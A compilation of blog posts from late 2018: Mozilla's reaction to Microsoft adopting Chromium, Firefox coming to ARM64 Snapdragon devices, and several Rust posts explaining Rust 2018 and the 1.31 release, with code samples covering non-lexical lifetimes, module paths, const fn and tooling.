From a business point of view Microsoft’s decision may well make sense. Google is so close to almost complete control of the infrastructure of our online lives that it may not be profitable to continue to fight this. The interests of Microsoft’s shareholders may well be served by giving up on the freedom and choice that the internet once offered us. Google is a fierce competitor with highly talented employees and a monopolistic hold on unique assets. Google’s dominance across search, advertising, smartphones, and data capture creates a vastly tilted playing field that works against the rest of us.

From a social, civic and individual empowerment perspective ceding control of fundamental online infrastructure to a single company is terrible. This is why Mozilla exists. We compete with Google not because it’s a good business opportunity. We compete with Google because the health of the internet and online life depend on competition and choice. They depend on consumers being able to decide we want something better and to take action.

Will Microsoft’s decision make it harder for Firefox to prosper? It could. Making Google more powerful is risky on many fronts. And a big part of the answer depends on what the web developers and businesses who create services and websites do. If one product like Chromium has enough market share, then it becomes easier for web developers and businesses to decide not to worry if their services and sites work with anything other than Chromium. That’s what happened when Microsoft had a monopoly on browsers in the early 2000s before Firefox was released. And it could happen again.

If you care about what’s happening with online life today, take another look at Firefox. It’s radically better than it was 18 months ago — Firefox once again holds its own when it comes to speed and performance. Try Firefox as your default browser for a week and then decide. Making Firefox stronger won’t solve all the problems of online life — browsers are only one part of the equation. But if you find Firefox is a good product for you, then your use makes Firefox stronger. Your use helps web developers and businesses think beyond Chrome. And this helps Firefox and Mozilla make overall life on the internet better — more choice, more security options, more competition.

The post Goodbye, EdgeHTML appeared first on The Mozilla Blog.

Mozilla Future Releases BlogFirefox Coming to the Windows 10 on Qualcomm Snapdragon Devices Ecosystem

At Mozilla, we’ve been building browsers for 20 years and we’ve learned a thing or two over those decades. One of the most important lessons is putting people at the center of the web experience. We pioneered user-centric features like tabbed browsing, automatic pop-up blocking, integrated web search, and browser extensions for the ultimate in personalization. All of these innovations support real users’ needs first, putting business demands in the back seat.

Mozilla is uniquely positioned to build browsers that act as the user’s agent on the web and not simply as the top of an advertising funnel. Our mission not only allows us to put privacy and security at the forefront of our product strategy, it demands that we do so. You can see examples of this with Firefox’s Facebook Container extension, Firefox Monitor, and its private by design browser data syncing features. This will become even more apparent in upcoming releases of Firefox that will block certain cross-site and third-party tracking by default while delivering a fast, personal, and highly mobile experience.

When we set out several years ago to build a new version of Firefox called Quantum, one that utilized multiple computer processes the way an operating system does, we didn’t simply break the browser into as many processes as possible. We investigated what kinds of hardware people had and built a solution that took best advantage of processors with multiple cores, which also makes Firefox a great browser for Snapdragon. We also offloaded significant page loading tasks to the increasingly powerful GPUs shipping with modern PCs and we re-designed the browser front-end to bring more efficiency to everyday tasks.

Today, Mozilla is excited to be collaborating with Qualcomm and optimizing Firefox for the Snapdragon compute platform with a native ARM64 version of Firefox that takes full advantage of the capabilities of the Snapdragon compute platform and gives users the most performant out of the box experience possible. We can’t wait to see Firefox delivering blazing fast experiences for the always on, always connected, multi-core Snapdragon compute platform with Windows 10.

Stay tuned. It’s going to be great!

The post Firefox Coming to the Windows 10 on Qualcomm Snapdragon Devices Ecosystem appeared first on Future Releases.

Hacks.Mozilla.OrgRust 2018 is here… but what is it?

This post was written in collaboration with the Rust Team (the “we” in this article). You can also read their announcement on the Rust blog.

Starting today, the Rust 2018 edition is in its first release. With this edition, we’ve focused on productivity… on making Rust developers as productive as they can be.

A timeline showing the different channels: beta, Rust 2018, and Rust 2015, with features flowing from beta to the other two. The timeline is surrounded by icons for tooling and for 4 domains: WebAssembly, embedded, networking, and CLI. A red circle surrounds everything except for Rust 2015 and is labeled with Developer Productivity.

But beyond that, it can be hard to explain exactly what Rust 2018 is.

Some people think of it as a new version of the language, which it is… kind of, but not really. I say “not really” because if this is a new version, it doesn’t work like versioning does in other languages.

In most other languages, when a new version of the language comes out, any new features are added to that new version. The previous version doesn’t get new features.

Rust editions are different. This is because of the way the language is evolving. Almost all of the new features are 100% compatible with Rust as it is. They don’t require any breaking changes. That means there’s no reason to limit them to Rust 2018 code. New versions of the compiler will continue to support “Rust 2015 mode”, which is what you get by default.

But sometimes to advance the language, you need to add things like new syntax. And this new syntax can break things in existing code bases.

An example of this is the async/await feature. Rust initially didn’t have the concepts of async and await. But it turns out that these primitives are really helpful. They make it easier to write code that is asynchronous without the code getting unwieldy.

To make it possible to add this feature, we need to add both async and await as keywords. But we also have to be careful that we’re not making old code invalid… code that might’ve used the words async or await as variable names.

So we’re adding the keywords as part of Rust 2018. Even though the feature hasn’t landed yet, the keywords are now reserved. All of the breaking changes needed for the next three years of development (like adding new keywords) are being made in one go, in Rust 1.31.
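For example, the following is fine in a crate that stays on the 2015 edition, but is rejected once the crate opts in to Rust 2018, where async is a reserved keyword:

// Compiles under edition = "2015": async is just an ordinary identifier there.
fn main() {
    let async = 1;
    println!("{}", async);
}

// Under edition = "2018" the same code is an error, because async is now a
// keyword; the variable has to be renamed (or written as the raw identifier
// r#async).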

Timeline with a line connecting Rust 2015 to the start of Rust 2018 at release 1.31.

Even though there are breaking changes in Rust 2018, that doesn’t mean your code will break. Your code will continue compiling even if it has async or await as a variable name. Unless you tell it otherwise, the compiler assumes you want it to compile your code the same way that it has been up to this point.

But as soon as you want to use one of these new, breaking features, you can opt in to Rust 2018 mode. You just run cargo fix, which will tell you if you need to update your code to use the new features. It will also mostly automate the process of making the changes. Then you can add edition=2018 to your Cargo.toml to opt in and use the new features.

This edition specifier in Cargo.toml doesn’t apply to your whole project… it doesn’t apply to your dependencies. It’s scoped to just the one crate. This means you’ll be able to have crate graphs that have Rust 2015 and Rust 2018 interspersed.

Because of this, even once Rust 2018 is out there, it’s mostly going to look the same as Rust 2015. Most changes will land in both Rust 2018 and Rust 2015. Only the handful of features that require breaking changes won’t pass through. 

Rust 2018 isn’t just about changes to the core language, though. In fact, far from it.

Rust 2018 is a push to make Rust developers more productive. Many productivity wins come from things outside of the core language… things like tooling. They also come from focusing on specific use cases and figuring out how Rust can be the most productive language for those use cases.

So you could think of Rust 2018 as the specifier in Cargo.toml that you use to enable the handful of features that require breaking changes…

Timeline with arrows pointing to the couple of Rust 2018 features that aren't passing through to Rust 2015.

Or you can think about it as a moment in time, where Rust becomes one of the most productive languages you can use in many cases — whenever you need performance, light footprint, or high reliability.

In our minds, it’s the second. So let’s look at all that happened outside of the core language. Then we can dive into the core language itself.

Rust for specific use cases

A programming language can’t be productive by itself, in the abstract. It’s productive when put to some use. Because of this, the team knew we didn’t just need to make Rust as a language or Rust tooling better. We also needed to make it easier to use Rust in particular domains.

In some cases, this meant creating a whole new set of tools for a whole new ecosystem.

In other cases, it meant polishing what was already in the ecosystem and documenting it well so that it’s easy to get up and running.

The Rust team formed working groups focused on four domains:

  • WebAssembly
  • Embedded applications
  • Networking
  • Command line tools

WebAssembly

For WebAssembly, the working group needed to create a whole new suite of tools.

Just last year, WebAssembly made it possible to compile languages like Rust to run on the web. Since then, Rust has quickly become the best language for integrating with existing web applications.

Rust logo and JS logo with a heart in between

Rust is a good fit for web development for two reasons:

  1.  Cargo’s crates ecosystem works in the same way that most web app developers are used to. You pull together a bunch of small modules to form a larger application. This means that it’s easy to use Rust just where you need it.
  2. Rust has a light footprint and doesn’t require a runtime. This means that you don’t need to ship down a bunch of code. If you have a tiny module doing lots of heavy computational work, you can introduce a few lines of Rust just to make that run faster.

With the web-sys and js-sys crates, it’s easy to call web APIs like fetch or appendChild from Rust code. And wasm-bindgen makes it easy to support high-level data types that WebAssembly doesn’t natively support.
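As a rough sketch (assuming a crate set up with wasm-bindgen, and web-sys compiled with the Window, Document, Element, Node, and HtmlElement features), calling a DOM API from Rust looks roughly like this:

use wasm_bindgen::prelude::*;

// Exported to JavaScript; call run() from the JS side after loading the module.
#[wasm_bindgen]
pub fn run() -> Result<(), JsValue> {
    let window = web_sys::window().expect("no global window");
    let document = window.document().expect("no document on window");
    let body = document.body().expect("document has no body");

    // Create a <p> element and append it to the page body.
    let p = document.create_element("p")?;
    p.set_text_content(Some("Hello from Rust and WebAssembly!"));
    body.append_child(&p)?;

    Ok(())
}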

Once you’ve coded up your Rust WebAssembly module, there are tools to make it easy to plug it into the rest of your web application. You can use wasm-pack to run these tools automatically, and push your new module up to npm if you want.

Check out the Rust and WebAssembly book to try it yourself.

What’s next?

Now that Rust 2018 has shipped, the working group is figuring out where to take things next. They’ll be working with the community to determine the next areas of focus.

Embedded

For embedded development, the working group needed to make existing functionality stable.

In theory, Rust has always been a good language for embedded development. It gives embedded developers the modern day tooling that they are sorely lacking, and very convenient high-level language features. All this without sacrificing on resource usage. So Rust seemed like a great fit for embedded development.

However, in practice it was a bit of a wild ride. Necessary features weren’t in the stable channel. Plus, the standard library needed to be tweaked for use on embedded devices. That meant that people had to compile their own version of the Rust core crate (the crate which is used in every Rust app to provide Rust’s basic building blocks — intrinsics and primitives).
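For a flavour of what a project looks like today, here is a minimal skeleton in the style of the Embedded Rust book, assuming the cortex-m-rt and panic-halt crates and a Cortex-M target:

#![no_std]  // link only core, not the full standard library
#![no_main] // the runtime crate, not the OS, provides the entry point

extern crate panic_halt; // halt on panic instead of unwinding

use cortex_m_rt::entry;

#[entry]
fn main() -> ! {
    // Device setup and the main loop go here.
    loop {}
}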

On the left: Someone riding a bucking microprocessor chip, saying "Whoa, Rusty!". On the right, someone riding a tame microprocessor chip saying "Good Rusty, nice and steady"

Together, these two things meant developers had to depend on the nightly version of Rust. And since there were no automated tests for micro-controller targets, nightly would often break for these targets.

To fix this, the working group needed to make sure that necessary features were in the stable channel. We also had to add tests to the CI system for micro-controller targets. This means a person adding something for a desktop component won’t break something for an embedded component.

With these changes, embedded development with Rust moves away from the bleeding edge and towards the plateau of productivity.

Check out the Embedded Rust book to try it yourself.

What’s next?

With this year’s push, Rust has really good support for ARM Cortex-M family of microprocessor cores, which are used in a lot of devices. However, there are lots of architectures used on embedded devices, and those aren’t as well supported. Rust needs to expand to have the same level of support for these other architectures.

Networking

For networking, the working group needed to build a core abstraction into the language—async/await. This way, developers can use idiomatic Rust even when the code is asynchronous.

For networking tasks, you often have to wait. For example, you may be waiting for a response to a request. If your code is synchronous, that means the work will stop—the CPU core that is running the code can’t do anything else until the request comes in. But if you code asynchronously, then the function that’s waiting for the response can go on hold while the CPU core takes care of running other functions.
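To ground the comparison, here is the synchronous version of a typical networking task, using only the standard library. The goal of async/await is to let the asynchronous version read almost exactly like this, with .await marking the points where the task is suspended instead of blocking the thread:

use std::io::{BufRead, BufReader, Result};
use std::net::TcpStream;

// The calling thread blocks inside read_line until a full line arrives.
fn greeting(stream: TcpStream) -> Result<String> {
    let mut reader = BufReader::new(stream);
    let mut line = String::new();
    reader.read_line(&mut line)?;
    Ok(line.trim().to_owned())
}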

Coding asynchronous Rust is possible even with Rust 2015. And there are lots of upsides to this. On the large scale, for things like server applications, it means that your code can handle many more connections per server. On the small scale, for things like embedded applications that are running on tiny, single threaded CPUs, it means you can make better use of your single thread.

But these upsides came with a major downside—you couldn’t use the borrow checker for that code, and you would have to write unidiomatic (and somewhat confusing) Rust. This is where async/await comes in. It gives the compiler the information it needs to borrow check across asynchronous function calls.

The keywords for async/await were introduced in 1.31, although they aren’t currently backed by an implementation. Much of that work is done, and you can expect the feature to be available in an upcoming release.

What’s next?

Beyond just enabling productive low-level development for networking applications, Rust could enable more productive development at a higher level.

Many servers need to do the same kinds of tasks. They need to parse URLs or work with HTTP. If these were turned into components—common abstractions that could be shared as crates—then it would be easy to plug them together to form all sorts of different servers and frameworks.

To drive the component development process, the Tide framework is providing a test bed for, and eventually example usage of, these components.

Command line tools

For command line tools, the working group needed to bring together smaller, low-level libraries into higher level abstractions, and polish some existing tools.

For some CLI scripts, you really want to use bash. For example, if you just need to call out to other shell tools and pipe data between them, then bash is best.

But Rust is a great fit for a lot of other kinds of CLI tools. For example, it’s great if you are building a complex tool like ripgrep or building a CLI tool on top of an existing library’s functionality.

Rust doesn’t require a runtime and allows you to compile to a single static binary, which makes it easy to distribute. And you get high-level abstractions that you don’t get with other languages like C and C++, so that already makes Rust CLI developers productive.

What did the working group need to make this better still? Even higher-level abstractions.

With these higher-level abstractions, it’s quick and easy to assemble a production ready CLI.

An example of one of these abstractions is the human panic library. Without this library, if your CLI code panics, it probably outputs the entire back trace. But that’s not very helpful for your end users. You could add custom error handling, but that requires effort.

If you use human panic, then the output will be automatically routed to an error dump file. What the user will see is a helpful message suggesting that they report the issue and upload the error dump file.
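Setting it up is essentially a one-liner in main. A minimal sketch, using the human-panic crate's setup_panic macro:

use human_panic::setup_panic;

fn main() {
    // Replace the default panic output with a friendly message plus a dump file.
    setup_panic!();

    // Any panic past this point shows the human-friendly report instead of a
    // raw backtrace.
    println!("Doing risky CLI things...");
}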

A cli tool with friendly output from human-panic

The working group also made it easier to get started with CLI development. For example, the confy library will automate a lot of setup for a new CLI tool. It only asks you two things:

  • What’s the name of your application?
  • What are configuration options you want to expose (which you define as a struct that can be serialized and deserialized)?

From that, confy will figure out the rest for you.
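A minimal sketch of that workflow (assuming serde with its derive feature and confy as dependencies; the application name and config fields here are invented, and the load function is shown as it existed around this time):

use serde::{Deserialize, Serialize};

// The configuration options you want to expose, as a (de)serializable struct.
// Default supplies the values used when no config file exists yet.
#[derive(Serialize, Deserialize, Default, Debug)]
struct MyConfig {
    username: String,
    use_colors: bool,
}

fn main() -> Result<(), confy::ConfyError> {
    // Loads (or creates with defaults) the config file for "my-cli-tool".
    let cfg: MyConfig = confy::load("my-cli-tool")?;
    println!("Hello, {}! colors: {}", cfg.username, cfg.use_colors);
    Ok(())
}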

What’s next?

The working group abstracted away a lot of different tasks that are common between CLIs. But there’s still more that could be abstracted away. The working group will be making more of these high level libraries, and fixing more paper cuts as they go.

Rust tooling

Tooling icon

When you experience a language, you experience it through tools. This starts with the editor that you use. It continues through every stage of the development process, and through maintenance.

This means that a productive language depends on productive tooling.

Here are some tools (and improvements to Rust’s existing tooling) that were introduced as part of Rust 2018.

IDE support

Of course, productivity hinges on fluidly getting code from your mind to the screen quickly. IDE support is critical to this. To support IDEs, we need tools that can tell the IDE what Rust code actually means — for example, to tell the IDE what strings make sense for code completion.

In the Rust 2018 push, the community focused on the features that IDEs needed. With Rust Language Server and IntelliJ Rust, many IDEs now have fluid Rust support.

Faster compilation

With compilation, faster means more productive. So we’ve made the compiler faster.

Before, when you would compile a Rust crate, the compiler would recompile every single file in the crate. But now, with incremental compilation, the compiler is smart and only recompiles the parts that have changed. This, along with other optimizations, has made the Rust compiler much faster.

rustfmt

Productivity also means not having to fix style nits (and never having to argue over formatting rules).

The rustfmt tool helps with this by automatically reformatting your code using a default code style (which the community reached consensus on). Using rustfmt ensures that all of your Rust code conforms to the same style, like clang-format does for C++ and Prettier does for JavaScript.

Clippy

Sometimes it’s nice to have an experienced advisor by your side… giving you tips on best practices as you code. That’s what Clippy does: it reviews your code as you go and tells you how to make that code more idiomatic.

rustfix

But if you have an older code base that uses outmoded idioms, then just getting tips and correcting the code yourself can be tedious. You just want someone to go into your code base and make the corrections.

For these cases, rustfix will automate the process. It will both apply lints from tools like Clippy and update older code to match Rust 2018 idioms.

Changes to Rust itself

These changes in the ecosystem have brought lots of productivity wins. But some productivity issues could only be fixed with changes to the language itself.

As I talked about in the intro, most of the language changes are completely compatible with existing Rust code. These changes are all part of Rust 2018. But because they don’t break any code, they also work in any Rust code… even if that code doesn’t use Rust 2018.

Let’s look at a few of the big language features that were added to all editions. Then we can look at the small list of Rust 2018-specific features.

New language features for all editions

Here’s a small sample of the big new language features that are (or will be) in all language editions.

More precise borrow checking (e.g. Non-Lexical Lifetimes)

One big selling point for Rust is the borrow checker. The borrow checker helps ensure that your code is memory safe. But it has also been a pain point for new Rust developers.

Part of that is learning new concepts. But there was another big part… the borrow checker would sometimes reject code that seemed like it should work, even to those who understood the concepts.

borrow checker telling a programmer that they can't borrow a variable because it's already borrowed

This is because the lifetime of a borrow was assumed to go all the way to the end of its scope — for example, to the end of the function that the variable is in.

This meant that even though the variable was done with the value and wouldn’t try to access it anymore, other variables were still denied access to it until the end of the function.

To fix this, we’ve made the borrow checker smarter. Now it can see when a variable is actually done using a value. If it is done, then it doesn’t block other borrowers from using the data.
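Here is a small example that the old, scope-based borrow checker rejected but that the more precise analysis accepts:

fn main() {
    let mut scores = vec![1, 2, 3];

    let first = &scores[0];             // shared borrow begins here...
    println!("first score: {}", first); // ...and is last used here

    // With non-lexical lifetimes the borrow ends after its last use, so this
    // mutation is fine. The old checker kept the borrow alive until the end of
    // the scope and reported that scores was still borrowed.
    scores.push(4);
}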

borrow checker saying, Oh, now I see

While this is only available in Rust 2018 as of today, it will be available in all editions in the near future. I’ll be writing more about all of this soon.

Procedural macros on stable Rust

Macros in Rust have been around since before Rust 1.0. But with Rust 2018, we’ve made some big improvements, like introducing procedural macros.

With procedural macros, it’s kind of like you can add your own syntax to Rust.

Rust 2018 brings two kinds of procedural macros:

Function-like macros

Function-like macros allow you to have things that look like regular function calls, but that are actually run during compilation. They take in some code and spit out different code, which the compiler then inserts into the binary.

They’ve been around for a while, but what you could do with them was limited. Your macro could only take the input code and run a match statement on it. It didn’t have access to look at all of the tokens in that input code.

But with procedural macros, you get the same input that a parser gets — a token stream. This means you can create much more powerful function-like macros.
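A minimal sketch of such a macro (it lives in its own crate with proc-macro = true in Cargo.toml, and the shout! macro is invented for illustration):

extern crate proc_macro;

use proc_macro::TokenStream;

// Called as shout!(hello world); receives the raw tokens of its input and
// returns new tokens that the compiler splices in at the call site.
#[proc_macro]
pub fn shout(input: TokenStream) -> TokenStream {
    let upper = input.to_string().to_uppercase();
    // Emit a string literal containing the upper-cased input.
    format!("{:?}", upper).parse().unwrap()
}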

Attribute-like macros

If you’re familiar with decorators in languages like JavaScript, attribute macros are pretty similar. They allow you to annotate bits of code in Rust that should be preprocessed and turned into something else.

The derive macro does exactly this kind of thing. When you put derive above a struct, the compiler will take that struct in (after it has been parsed as a list of tokens) and fiddle with it. Specifically, it will add a basic implementation of functions from a trait.
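For example, the built-in derives generate trait implementations directly from the struct definition:

// The compiler parses the struct, hands the tokens to the derive macros, and
// splices the generated Debug and Clone impls back into the crate.
#[derive(Debug, Clone)]
struct Point {
    x: i32,
    y: i32,
}

fn main() {
    let p = Point { x: 1, y: 2 };
    println!("{:?}", p.clone());
}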

More ergonomic borrowing in matching

This change is pretty straight-forward.

Before, if you wanted to borrow something and tried to match on it, you had to add some weird looking syntax:

Old version of the code with &Some(ref s) next to new version with Some(s)

But now, you don’t need the &Some(ref s) anymore. You can just write Some(s), and Rust will figure it out from there.
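In code, the difference looks like this:

fn describe(opt: &Option<String>) {
    // Rust used to require spelling out the borrow in the pattern:
    //     match opt { &Some(ref s) => ..., &None => ... }
    // Now the binding mode is inferred from the fact that opt is a reference:
    match opt {
        Some(s) => println!("got {}", s),
        None => println!("got nothing"),
    }
}

fn main() {
    describe(&Some(String::from("hi")));
    describe(&None);
}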

New features specific to Rust 2018

The smallest part of Rust 2018 are the features specific to it. Here are the small handful of changes that using the Rust 2018 edition unlocks.

Keywords

There are a few keywords that have been added to Rust 2018.

  • try keyword
  • async/await keyword

These features haven’t been fully implemented yet, but the keywords are being added in Rust 1.31. This means we don’t have to introduce new keywords (which would be a breaking change) in the future, once the features behind these keywords are implemented.

The module system

One big pain point for developers learning Rust is the module system. And we could see why. It was hard to reason about how Rust would choose which module to use.

To fix this, we made a few changes to the way paths work in Rust.

For example, if you imported a crate, you could use it in a path at the top level. But if you moved any of the code to a submodule, then it wouldn’t work anymore.

// top level module
extern crate serde;

// this works fine at the top level
impl serde::Serialize for MyType { ... }

mod foo {
  // but it does *not* work in a sub-module
  impl serde::Serialize for OtherType { ... }
}

Another example is the prefix ::, which used to refer to either the crate root or an external crate. It could be hard to tell which.

We’ve made this more explicit. Now, if you want to refer to the crate root, you use the prefix crate:: instead. And this is just one of the path clarity improvements we’ve made.
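So, in a crate that has opted in to Rust 2018, a submodule can name items from the crate root unambiguously:

mod config {
    pub fn default_port() -> u16 { 8080 }
}

mod server {
    pub fn start() {
        // crate:: always means "the root of this crate", never an external crate.
        let port = crate::config::default_port();
        println!("listening on port {}", port);
    }
}

fn main() {
    server::start();
}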

If you have existing Rust code and you want it to use Rust 2018, you’ll very likely need to update it for these new module paths. But that doesn’t mean that you’ll need to manually update your code. Run cargo fix before you add the edition specifier to Cargo.toml and rustfix will make all the changes for you.

Learn More

Learn all about this edition in the Rust 2018 edition guide.

The post Rust 2018 is here… but what is it? appeared first on Mozilla Hacks - the Web developer blog.

The Rust Programming Language BlogA call for Rust 2019 Roadmap blog posts

It's almost 2019! As such, the Rust team needs to create a roadmap for Rust's development next year. At the highest level, Rust's development process looks like this:

  1. The Rust community blogs about what they'd like to see.
  2. The core team reads these posts, and produces a "roadmap RFC," a proposal for what next year's development looks like.
  3. The RFC is widely discussed, and modified in response to feedback, and eventually accepted.
  4. This RFC becomes a guideline for accepting or postponing RFCs for the next year.

We try to align this with the calendar year, but it doesn't 100% match up, currently. Last year, we had a call for posts on January 3, the roadmap RFC was opened on Jan 29th, and was accepted on March 5th. This year, we're starting a bit earlier, but it's still not going to be accepted before January 1.

We need you

Starting today and running until January 15, we’d like to ask the community to write blog posts reflecting on Rust in 2018 and proposing goals and directions for Rust in 2019. Like last year, these can take many forms:

  • A post on your personal or company blog
  • A Medium post
  • A GitHub gist
  • Or any other online writing platform you prefer.

We’re looking for posts on many topics:

  • Ideas for community programs
  • Language features
  • Documentation improvements
  • Ecosystem needs
  • Tooling enhancements
  • Or anything else Rust related you hope for in 2019

There's one additional thing this year, however. With the shipping of Rust 2018 today, it's time to think about the next edition. In other words:

  • Rust 2015: Stability
  • Rust 2018: Productivity
  • Rust 2021: ?

We aren't yet committing to an edition in 2021, but that's the current estimate. Each edition has had some sort of theme associated with it. As such, we wouldn't just like to know what you're thinking for Rust in 2019, but also, what you want the theme of Rust 2021 to be. Ideally, suggestions for Rust in 2019 will fit into the overall goal of the next edition, though of course, three years is a lot of time, and so not every single thing must. As Rust matures, we need to start thinking of ever-longer horizons, and how our current plans fit into those eventual plans.

If you're not sure what to write, check out all of the blog posts from last year over at ReadRust. They may give you some inspiration!

Please share these posts with us

You can write up these posts and email them to community@rust-lang.org or tweet them with the hashtag #rust2019.

The Core team will be reading all of the submitted posts and using them to inform the initial roadmap RFC for 2019. Once the RFC is submitted, we’ll open up the normal RFC process, though if you want, you are welcome to write a post and link to it on the GitHub discussion.

We look forward to working with the entire community to make Rust even more wonderful in 2019. Thanks for an awesome 2018!

The Rust Programming Language BlogAnnouncing Rust 1.31 and Rust 2018

The Rust team is happy to announce a new version of Rust, 1.31.0, and "Rust 2018" as well. Rust is a programming language that empowers everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, getting Rust 1.31.0 is as easy as:

$ rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.31.0 on GitHub.

What's in 1.31.0 stable

Rust 1.31 may be the most exciting release since Rust 1.0! Included in this release is the first iteration of "Rust 2018," but there's more than just that! This is going to be a long post.

Rust 2018

We wrote about Rust 2018 first in March, and then in July. For some more background about the why of Rust 2018, please go read those posts; there's a lot to cover in the release announcement, so we're going to focus on the what here. There's also a post on Mozilla Hacks!

Briefly, Rust 2018 is an opportunity to bring all of the work we've been doing over the past three years together and create a cohesive package. This is more than just language features; it also includes:

  • Tooling (IDE support, rustfmt, Clippy)
  • Documentation
  • Work from the domain working groups
  • A new web site

We'll be covering all of this and more in this post.

Let's create a new project with Cargo:

$ cargo new foo

Here's the contents of Cargo.toml:

[package]
name = "foo"
version = "0.1.0"
authors = ["Your Name <you@example.com>"]
edition = "2018"

[dependencies]

A new key has been added under [package]: edition. Note that it has been set to 2018. You can also set it to 2015, which is the default if the key does not exist.

By using Rust 2018, some new features are unlocked that are not allowed in Rust 2015.

It is important to note that each package can be in either 2015 or 2018 mode, and they work seamlessly together. Your 2018 project can use 2015 dependencies, and a 2015 project can use 2018 dependencies. This ensures that we don't split the ecosystem, and all of these new things are opt-in, preserving compatibility for existing code. Furthermore, when you do choose to migrate Rust 2015 code to Rust 2018, the changes can be made automatically, via cargo fix.

What kind of new features, you may ask? Well, first, features get added to Rust 2015 unless they require some sort of incompatibility with 2015's features. As such, most of the language is available everywhere. You can check out the edition guide to check each feature's minimum rustc version as well as edition requirements. However, there are a few big-ticket features we'd like to mention here: non-lexical lifetimes, and some module system improvements.

Non-lexical lifetimes

If you've been following Rust's development over the past few years, you may have heard the term "NLL" or "non-lexical lifetimes" thrown around. This is jargon, but it has a straightforward translation into simpler terms: the borrow checker has gotten smarter, and now accepts some valid code that it previously rejected. Consider this example:

fn main() {
    let mut x = 5;

    let y = &x;

    let z = &mut x;
}

In older Rust, this is a compile-time error:

error[E0502]: cannot borrow `x` as mutable because it is also borrowed as immutable
 --> src/main.rs:5:18
  |
4 |     let y = &x;
  |              - immutable borrow occurs here
5 |     let z = &mut x;
  |                  ^ mutable borrow occurs here
6 | }
  | - immutable borrow ends here

This is because lifetimes follow "lexical scope"; that is, the borrow from y is considered to be held until y goes out of scope at the end of main, even though we never use y again. This code is fine, but the borrow checker could not handle it.

Today, this code will compile just fine.

What if we did use y, like this for example:

fn main() {
    let mut x = 5;
    let y = &x;
    let z = &mut x;
    
    println!("y: {}", y);
}

Older Rust will give you this error:

error[E0502]: cannot borrow `x` as mutable because it is also borrowed as immutable
 --> src/main.rs:5:18
  |
4 |     let y = &x;
  |              - immutable borrow occurs here
5 |     let z = &mut x;
  |                  ^ mutable borrow occurs here
...
8 | }
  | - immutable borrow ends here

With Rust 2018, this error changes for the better:

error[E0502]: cannot borrow `x` as mutable because it is also borrowed as immutable
 --> src/main.rs:5:13
  |
4 |     let y = &x;
  |             -- immutable borrow occurs here
5 |     let z = &mut x;
  |             ^^^^^^ mutable borrow occurs here
6 |     
7 |     println!("y: {}", y);
  |                       - borrow later used here

Instead of pointing to where y goes out of scope, it shows you where the conflicting borrow occurs. This makes these sorts of errors far easier to debug.

In Rust 1.31, this feature is exclusive to Rust 2018. We plan to backport it to Rust 2015 at a later date.

Module system changes

The module system can be a struggle for people first learning Rust. Everyone has their own things that take time to master, of course, but there's a root cause for why it's so confusing to many: while there are simple and consistent rules defining the module system, their consequences can feel inconsistent, counterintuitive and mysterious.

As such, the 2018 edition of Rust introduces a few changes to how paths work, but they end up simplifying the module system and making it clearer what is going on.

Here's a brief summary:

  • extern crate is no longer needed in almost all circumstances.
  • You can import macros with use, rather than a #[macro_use] attribute.
  • Absolute paths begin with a crate name, where the keyword crate refers to the current crate.
  • A foo.rs and foo/ subdirectory may coexist; mod.rs is no longer needed when placing submodules in a subdirectory.

These may seem like arbitrary new rules when put this way, but the mental model is now significantly simplified overall.

There's a lot of details here, so please read the edition guide for full details.
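
As a rough sketch of how these rules fit together (the crate layout and names here are made up, and it assumes a log dependency in Cargo.toml):

// src/lib.rs, Rust 2018: no `extern crate log;` and no `#[macro_use]`
use log::info;           // macros are now imported with a plain `use`
use crate::store::Store; // `crate::` names this crate's root

mod store; // may live in src/store.rs, with submodules in src/store/ (no mod.rs needed)

pub fn open() -> Store {
    info!("opening the store");
    Store::default()
}

// src/store.rs
#[derive(Default)]
pub struct Store {
    pub entries: Vec<String>,
}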

More lifetime elision rules

Let's talk about a feature that's available in both editions: we've added some additional elision rules for impl blocks and function definitions. Code like this:

impl<'a> Reader for BufReader<'a> {
    // methods go here
}

can now be written like this:

impl Reader for BufReader<'_> {
    // methods go here
}

The '_ lifetime still shows that BufReader takes a parameter, but we don't need to create a name for it anymore.
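
The same anonymous lifetime works in function signatures. A small made-up example:

struct Wrapper<'a> {
    name: &'a str,
}

// Rust 2015 style would be: fn greet<'a>(w: &Wrapper<'a>) { ... }
fn greet(w: &Wrapper<'_>) {
    println!("hello, {}", w.name);
}

fn main() {
    let w = Wrapper { name: "world" };
    greet(&w);
}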

Lifetimes are still required to be defined in structs. However, we no longer require as much boilerplate as before:

// Rust 2015
struct Ref<'a, T: 'a> {
    field: &'a T
}

// Rust 2018
struct Ref<'a, T> {
    field: &'a T
}

The : 'a is inferred. You can still be explicit if you prefer. We're considering some more options for elision here in the future, but have no concrete plans yet.

const fn

There are several ways to define a function in Rust: a regular function with fn, an unsafe function with unsafe fn, and an external function with extern fn. This release adds a new way to qualify a function: const fn. It looks like this:

const fn foo(x: i32) -> i32 {
    x + 1
}

A const fn can be called like a regular function, but it can also be used in any constant context. When it is, it is evaluated at compile time, rather than at run time. As an example:

const SIX: i32 = foo(5);

This will execute foo at compile time, and set SIX to 6.

const fns cannot do everything that normal fns can do; they must have deterministic output. This is important for soundness reasons. Currently, const fns can do a minimal subset of operations. Here are some examples of what you can do:

  • Arithmetic and comparison operators on integers
  • All boolean operators except for && and ||
  • Constructing arrays, structs, enums, and tuples
  • Calls to other const fns
  • Index expressions on arrays and slices
  • Field accesses on structs and tuples
  • Reading from constants (but not statics, not even taking a reference to a static)
  • & and * of references
  • Casts, except for raw pointer to integer casts

We'll be growing the abilities of const fn, but we've decided that this is enough useful stuff to start shipping the feature itself.

For full details, please see the reference.

New tools

The 2018 edition signals a new level of maturity for Rust's tools ecosystem. Cargo, Rustdoc, and Rustup have been crucial tools since 1.0; with the 2018 edition, there is a new generation of tools ready for all users: Clippy, Rustfmt, and IDE support.

Rust's linter, clippy, is now available on stable Rust. You can install it via rustup component add clippy and run it with cargo clippy. Clippy is now considered 1.0, which carries the same lint stability guarantees as rustc. New lints may be added, and lints may be modified to add more functionality, however lints may never be removed (only deprecated). This means that code that compiles under clippy will continue to compile under clippy (provided there are no lints set to error via deny), but may throw new warnings.

Rustfmt is a tool for formatting Rust code. Automatically formatting your code lets you save time and arguments by using the official Rust style. You can install with rustup component add rustfmt and use it with cargo fmt.

This release includes Rustfmt 1.0. From now on we guarantee backwards compatibility for Rustfmt: if you can format your code today, then the formatting will not change in the future (only with the default options). Backwards compatibility means that running Rustfmt on your CI is practical (use cargo fmt -- --check). Try that and 'format on save' in your editor to revolutionize your workflow.
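
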